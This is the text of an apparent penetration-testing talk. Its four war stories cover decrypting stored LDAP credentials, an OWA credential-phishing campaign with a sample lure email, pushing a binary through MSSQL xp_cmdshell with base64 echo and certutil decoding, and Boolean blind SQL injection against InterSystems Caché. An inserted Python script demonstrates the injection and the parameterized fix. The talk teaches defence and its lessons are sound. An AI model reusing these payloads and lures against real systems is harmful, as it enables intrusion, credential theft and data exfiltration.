    19 King without aCrown • The dev code repo environment was very easy to find • Code repository contains config files! • Config file contains credentials! #LDAP user Username=KCD3A08381467823D4013960E75E465F0B00C5E3BAEFBECBB Password=JFJA90BVM2ZO0YJF67NQ72YUVN7B71POCZM3098FABVDADG3Q • Wait, that doesn’t look right…
  • 20.
    20 King without aCrown • Config file contains encrypted credentials  • Company policy – passwords at rest MUST be encrypted or hashed
  • 21.
    21 King without aCrown • But the central management web-application isn’t the SERVER receiving these credentials • It is a CLIENT of the active directory when using them User Web Server Backend Client Client ServerServer • Password-driven authentication requires Clients to have the actual password!
  • 22.
    22 King without aCrown • Server has to have credentials in “plaintext” at some point… • Therefore - It must be able to decrypt this file!
  • 23.
    23 King without aCrown 1. Identify what part of code opens the encrypted credentials config file $filename = 'config.ini'; open($fh, $filename) or die "Could not open file '$filename'!"; *Pseudo-Code *
  • 24.
    24 King without aCrown 2. Trace code from that point to see where file is read, and where it is decrypted while ($row = $fh.readline()) { if ($row.startsWith('Username=')) { $username = crypto.decrypt($row[9:]); } if ($row.startsWith('Password=')) { $password = crypto.decrypt($row[9:]); } }
  • 25.
    25 King without aCrown 3. Reverse-engineer encryption! Function decrypt($encrypted) { $encrypted = reverseString($encrypted); $encrypted = $encrypted << 8; $magic = blowfish($encrypted, $keyOne); $decrypted = doMagic($magic,$keyTwo); return $decrypted; } $keyOne = ‘tQ@vH8dM%agy6Y4RO’; $keyTwo = ‘!#YCEKiMKijFtgcyZ’; This is very interesting and all but… Keep it simple! Grab their crypto!
  • 26.
    26 King without aCrown 4. “Develop” a decryption tool [stolen code goes here] print(“User:” + decrypt(“KCD3A08381467823D4013960E75E465F0B00C5E3BAEFBECBB”)); print(“Pass:” + decrypt(“JFJA90BVM2ZO0YJF67NQ72YUVN7B71POCZM3098FABVDADG3Q”)); User: admin1user Pass: 9m5!4G4GaZ1VU@oi9Xh 5. Profit
  • 27.
    27 King without aCrown • And that is how we became the first human domain admin they’ve seen in years • Was the “No domain admins” policy adhered?
  • 28.
    28 Conclusions • A lockis meaningless if you attach the keys to it – ditto for encryption and its keys • Keeping actionable information, such as passwords, in a dev environment is dangerous exposure • Bending policies is not a way to solve problems, it’s a way to obscure them (barely)
  • 29.
  • 30.
    30 The Phish thatKept On Phishing • Most phishing awareness exercises involve employee awareness, which is very important • Access that the average user has • Would clicking a suspicious link mean the user will also submit their password? • Or download and install a file? • “Spear-Phishing” – are employees aware of more sophisticated, targeted attacks? • But most phishing awareness exercises aren’t concerned with the risk of a successful attack
  • 31.
    31 The Phish thatKept On Phishing • Our client, a bank, wanted to find out what are the risks it faces from phishing • We’ll call them Hacme, because why not • They also required us to build a system for keeping track of phishing targets • Each targeted e-mail received a link with a token • This token was saved along with every action *Illustration, it actually looked nothing like this User Token IP User Agent Action Debbie M. ja1Kd2moXpP2mJ xxx.xxx.90.3 Mozilla/5.0 (iPhone; CPU iPhone OS…) Clicked Link yyy.yyy.10.12 Mozilla/5.0 (Windows NT 6.1; WOW64) Clicked Link yyy.yyy.10.12 Mozilla/5.0 (Windows NT 6.1; WOW64) Logged in! Andrew R. u0IL9aZxQmnV3a yyy.yyy.10.12 Mozilla/5.0 (Windows NT 6.1; WOW64) Clicked Link yyy.yyy.10.12 Mozilla/5.0 (Windows NT 6.1; WOW64) Downloaded File John U. 73aBVlkq9Arq8nb zzz.zzz.90.114 Mozilla/5.0 (Linux; Android 4.0.4;…) Clicked Link
  • 32.
    32 The Phish thatKept On Phishing • Good credentials to phish for should: • Lead to as many sensitive environments as possible (SSO) • Lead to sensitive data • Lead to MORE ACCESS
  • 33.
    33 The Phish thatKept On Phishing • OWA is likely to contain sensitive information • Accessible online • Easy to impersonate by either installing your own server, or just replicating the login • Seamless Phishing – user submits credentials, credentials are saved by attacker, client is forwarded seamlessly into their real OWA inbox • Never know what hit ‘em
  • 34.
    34 From: it-guy@hacme-mail.com To: [target]@hacme.com Pleaseforward. ---Forwarded Message--- From: it-manager@hacme.com Subject: Testing New OWA Login To All Employees, As many of you know, we were recently the targets of a large scale phishing attack[…] We are transitioning to a new & secure environment[…] https://owa.hacme-mail.com/owa/auth/login.aspx[…]
  • 35.
    35 The Phish thatKept On Phishing • Using our tracking system, we met our favorite victim ever - Debbie. • Debbie is the best! • We sent out 41 e-mails • How many users did we phish within 2 hours?
  • 36.
    36 117 That’s 300% (98 differentusers phished using Debbie’s token)
  • 37.
    37 The Phish thatKept On Phishing • On that day we celebrated Debbie, and all Debbies everywhere • In retrospect we found out it was way worse than we thought • …Debbie actually pulled this e-mail out of her spam box, before sending it to 300+ people. • Because despite this phishing e-mail successfully passing through our testing spam filters…
  • 38.
    38 The Phish thatKept On Phishing • We were able to prove that spam filters aren’t a good defense • Also that their phishing mitigation did not work • But also – how easy it is to compromise employee e- mails • We got a very broad user-base coverage – HR, PR, IT users • IT users apparently shared passwords over e-mail, too.
  • 39.
    39 The Phish thatKept On Phishing • Lets talk about Debbie• Is Debbie REALLY a ? • She may have messed up in her awareness • She may have set the bar low • But anyone can fall for the right lie
  • 40.
    40 Conclusions • Remember thisacronym: N.B.D. Never. Be. Debbie. • Even people who practice N.B.D. daily can be fooled – always know your risks. • 2-factor authentication, in this case, would have made a huge difference.
  • 41.
  • 42.
    42 A Crowbar forBinary • A big financial institute had us engage their online assets and hack in • We’ll call them Golden Calf Investments • Not that many online assets • Most interesting ones were scoped out because: • No testing accounts or environments • “Federal Regulations” (pfffff)
  • 43.
    43 A Crowbar forBinary • How do we get in if we’re told to stay away?? • Some canned marketing applications… • Skin deep customer service applications… • …Outsourced, not even part of the organization • A couple of old employee-only applications… • Wait a minute, that last one sounds promising!
  • 44.
    44 A Crowbar forBinary The New Target: • Application with known exploits • Got App-Admin in… 5 minutes? • Got code running on web-server within a couple of hours
  • 45.
    45 A Crowbar forBinary • Realize web-server is boring, except for one database connection • Database is internal, beyond DMZ? • New goal: we own the database • Wrote code to go through web- server and directly talk to DB (SQL)
  • 46.
    46 A Crowbar forBinary • So what database are we really attacking here? • MSSQL • Database running as “sa” (lol) • VERY strict firewall rules • Can’t pull malware. • Can’t do much from inside out, really. • So we HAVE to push!
  • 47.
    47 A Crowbar forBinary Challenge #1 – OS Commands: • MSSQL feature - use xp_cmdshell to execute OS commands • There’s a character restriction in SQL queries however • Binaries would never fit
  • 48.
    48 A Crowbar forBinary Challenge #2 – Writing to Disk: • Introducing the latest in computer hacking technology: THIS GUY!
  • 49.
    49 A Crowbar forBinary Challenge #3 – Normalization: • Binary is binary • It’s 99% garbage to (most) humans • May contain bytes that break requests, or get altered on the way • Normalize with Base64 – all bytes converted to alpha-numeric
  • 50.
    50 xp_cmdshell ‘ ‘; SQLQuery A Crowbar for Binary Hello World! Code SGVsbG 8gV29yb GQh Base64 echo SGVsbG8gV29ybGQh >> evil.b64.txt Echo to File • Now that we know how to get binaries unto the server, let’s do it! • Convert code to base64 • Chunk to segments that fit size restriction • For every segment – create command • For every command – execute with SQL
  • 51.
    51 A Crowbar forBinary • Great job getting a junk base64 file on the server! • How do we convert it back to binary without tools? • Maybe something that is naturally stored as either? • A certificate can be either a binary or base64. • It would be great if there was some sort of, I don’t know, a utility in Windows?util cert .exe -decode evil.b64.txt evil.exe
  • 52.
    52 A Crowbar forBinary • Score! • We’ve demonstrated executing a binary • From the internet • Riding a web server • Pass through the database with queries • And right into the DB’s operating system • Can install tools to scan internal network • Can have remote control with malware over DNS • In retrospect – this DB was co-hosted with their main business transaction OraDB. Double Score!
  • 53.
    53 Conclusions • A smallmisconfiguration behind an outdated system can be crowbarred into a gaping hole • Always patch your things, no matter how insignificant they seem • The Principle of Least Privilege
  • 54.
  • 55.
    55 (re)Applied Sciences • Reinventingthe wheel is usually not recommended when unnecessary • With the myriad of technologies out there, though, you never know what you’ll come across • Sometimes, it’s all about taking something you know and understand and applying it to something you don’t
  • 56.
    56 (re)Applied Sciences • Wewere working on a large shipping company, let’s call them “Planet Express” • We’ve found an application that behaves very oddly • Landing page is empty • Dorking “site:” leads to a directory listing
  • 57.
    57 (re)Applied Sciences • Directorylisting contains… e-mail files? • E-Mail files created very recently • E-Mail contents seem automated, and contain links back to the site itself • Links are to actual order information
  • 58.
    58 (re)Applied Sciences (Sophisticated Recreation) •Why is this application so weird? • Assumption: application is fully functioning when approached from internal network – externally, only links to orders can be accessed by clients
  • 59.
    59 (re)Applied Sciences • Soof course, we test the only parameter we can access in this app by setting “orderId” to “1’ A ‘” (Sophisticated Recreation) • …Pardon? • Not like any SQL error I have ever seen
60
(re)Applied Sciences
• And so a quick Google search taught us that this is, in fact…
61
Intersystems Cache SQL
Who?? What?? Ok, at least we know this word
62
(re)Applied Sciences
• What is this database, even??
• For one – it’s SQL, so it probably adheres to the same syntax:
• SELECT columns FROM database.table WHERE condition
• At the same time – it exhibits the exact same behavior a “common” SQL error would:
• Injected apostrophe (') breaks the syntax of the query
• Additional verbs after ' error out
• We can probably add more to the query, and get data!
63
(re)Applied Sciences
• So we can probably inject…
• …but the internet is clueless
• Very rare
• No tools
• No exploits
• Not even a tutorial
I DON’T KNOW WHO YOU ARE BUT I WILL READ ABOUT YOU AND I WILL HACK YOU
64
(re)Applied Sciences
• Which injection type do we choose?
• UNION based – unite columns to create new tables, hope web server renders right
• Error based – trigger an error that reflects information in its contents
• Boolean based – identify true and false conditions, use these as an oracle for data
• Boolean based is the only one that requires very little prior knowledge
65
(re)Applied Sciences
True statement: Give me orderId “AH0010-015” if 1=1
False statement: Give me orderId “AH0010-015” if 1=0
66
(re)Applied Sciences
• So what do we need for a Boolean SQL injection to work?
• We need to establish the injection variables for what we want to retrieve:
• SELECT columns FROM database.table WHERE boolean
• How do we find the database name?
• Table name?
• Column name?
• The right condition to help us retrieve data?
67
(re)Applied Sciences
• SQL usually has a table of tables, a table of databases, a table of columns etc.
• These are all mapped out in a known way
• Tools like SQLMap can automate the process because, once they fingerprint the database, they know where to find metadata
• But they’ve never even heard of “Intersystems Cache SQL”
68
(re)Applied Sciences
• Research – from documentation:
• Databases - SELECT SqlSchemaName FROM %dictionary.compiledclass WHERE SqlSchemaName LIKE '%'
• Tables - SELECT SqlSchemaName FROM %dictionary.compiledclass WHERE SqlSchemaName = 'db_name' AND SqlTableName LIKE 'table_name'
69
(re)Applied Sciences
• Research roadblock – no documentation of columns? Not in the same Dictionary.compiledclass??
• Ask an expert on StackOverflow!
70
(re)Applied Sciences
• We know where to get all the metadata we need to get all the stored data we want
• Now for a condition, and we’re good to go
• Keep it simple!
• WHERE parameter LIKE '[inject]%'
• WHERE parameter LIKE 'p%'
• WHERE parameter LIKE 'pa%'
• WHERE parameter LIKE 'pas%'…
71
(re)Applied Sciences
• Final injection form: orders.planetexpress.com/orders/manage/orders.jsp?orderId=AH00010-015' AND EXISTS (SELECT SqlSchemaName FROM %dictionary.compiledclass WHERE SqlSchemaName = 'db_name' AND SqlTableName LIKE 'table_name')
• Building this into a Python script that enumerates letters and numbers on the condition replicates the principles of SQLMap’s Boolean-based SQL injection
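The Boolean oracle from slides 65 to 71, as an added example that is not the authors' enumeration script: InterSystems Caché is not available offline, so an in-memory SQLite database stands in (an assumption), and sqlite_master plays the role %dictionary.compiledclass plays on Caché. The orders table, its rows and the two orderId handlers are constructed. The block puts the vulnerable string-built query beside a parameterized one and runs the same LIKE-prefix enumeration from slide 70 against both: it recovers the table name from the first and nothing from the second, which is the fix the story's conclusions point at.

```python
"""Boolean-based blind SQL injection: the vulnerable query beside its fix.

Added example, not the authors' script from slide 71. InterSystems Cache is not
available offline, so an in-memory SQLite database stands in (assumption), and
sqlite_master plays the role %dictionary.compiledclass plays on Cache. The
orders table, its rows and the orderId handlers are constructed.
"""
import sqlite3
from typing import Callable, List, Union

ORDER_ID = "AH0010-015"            # the known-good order from slide 65
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"   # '_' and '%' omitted: LIKE wildcards


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the Planet Express orders database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE orders (orderId TEXT PRIMARY KEY, customer TEXT, shipTo TEXT);
        INSERT INTO orders VALUES ('AH0010-015', 'Hermes Conrad', 'New New York');
        INSERT INTO orders VALUES ('AH0010-016', 'Amy Wong', 'Mars');
    """)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, order_id: str) -> Union[List[str], str]:
    """orderId pasted into the SQL text: the query shape the slides describe."""
    sql = "SELECT customer FROM orders WHERE orderId = '" + order_id + "'"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error as exc:
        return f"SQL error: {exc}"      # slide 59: the apostrophe breaks the syntax


def lookup_safe(conn: sqlite3.Connection, order_id: str) -> List[str]:
    """Parameterized query: the input is a bound value, never SQL text."""
    return [row[0] for row in
            conn.execute("SELECT customer FROM orders WHERE orderId = ?", (order_id,))]


Lookup = Callable[[sqlite3.Connection, str], Union[List[str], str]]


def oracle(lookup: Lookup, conn: sqlite3.Connection, condition: str) -> bool:
    """Slide 65: does the order still come back when `condition` is ANDed in?

    The trailing AND '1'='1 lets the handler's own closing quote finish the query."""
    result = lookup(conn, f"{ORDER_ID}' AND {condition} AND '1'='1")
    return isinstance(result, list) and len(result) > 0


def extract_table_name(lookup: Lookup, conn: sqlite3.Connection, max_len: int = 32) -> str:
    """Slide 70's prefix oracle: grow LIKE 'p%' -> 'pa%' -> 'pas%' one character at a time.

    Returns '' when no prefix ever answers true, which is the outcome against
    the parameterized handler."""
    known = ""
    for _ in range(max_len):
        for ch in ALPHABET:
            cond = ("EXISTS (SELECT name FROM sqlite_master "
                    f"WHERE type='table' AND name LIKE '{known + ch}%')")
            if oracle(lookup, conn, cond):
                known += ch
                break
        else:
            break      # no character extends the prefix: name complete (or nothing leaked)
    return known


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "1' A '"))                 # an SQL error, as on slide 59
    print(extract_table_name(lookup_vulnerable, db))       # 'orders' leaks character by character
    print(repr(extract_table_name(lookup_safe, db)))       # '' : the oracle never answers true
```

Against lookup_vulnerable the prefix loop recovers "orders" in well under a hundred requests, each one a normal-looking order lookup that returns either the page or nothing, which is why this class of bug is quiet in access logs. Against lookup_safe the same payload is just an orderId that does not exist: no error, no row, and the oracle has nothing to say.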
72
(re)Applied Sciences
• We never made it into a nice “tool” form
• We knew we were not likely to see this system ever again…
• But we dumped enough of the database to demonstrate we could get all shipping information on every single client
73
Conclusions
• Exotic technology is still technology
• Obscure is not Secure
• A simple external test would have revealed the information leakage which led to this exploitation
74
Final Thoughts
• Hacking is a lot more than just known vulnerabilities and available tools – it’s also a creative process
• Never underestimate your opponents
• Understanding & knowing risks and impact is as important as mitigating vulnerabilities in your network